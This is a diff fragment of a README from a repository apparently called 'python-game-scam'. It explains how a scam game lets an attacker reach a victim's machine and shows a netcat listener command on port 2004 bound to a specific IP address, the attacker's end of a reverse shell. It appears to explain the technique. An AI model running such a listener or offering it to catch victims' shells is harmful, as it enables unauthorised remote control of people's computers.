hirwablessing/python-game-scam/README.md

 ### How the scam works

-- The hacker opens up a vpn port at `82.165.97.169` for the victim to connect via port 2004
+- The hacker opens up a port at `82.165.97.169` for the victim to connect via port 2004

 ```bash
    $ nc -lnvp 2004 -s 82.165.97.169